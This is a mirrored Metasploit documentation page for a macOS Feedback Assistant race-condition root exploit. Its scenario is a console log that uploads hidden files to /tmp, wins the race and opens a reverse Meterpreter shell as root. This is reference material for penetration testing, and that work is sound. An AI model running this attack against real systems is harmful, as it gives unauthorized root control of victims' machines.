CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/osx/local/feedback_assistant_root.md
Views: 11655

Vulnerable Application

This module exploits a race condition in MacOS' Feedback Assistant, which would lead to root local privilege escalation.

Scenarios

msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run

[*] Started reverse TCP handler on 172.16.135.1:5555 
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >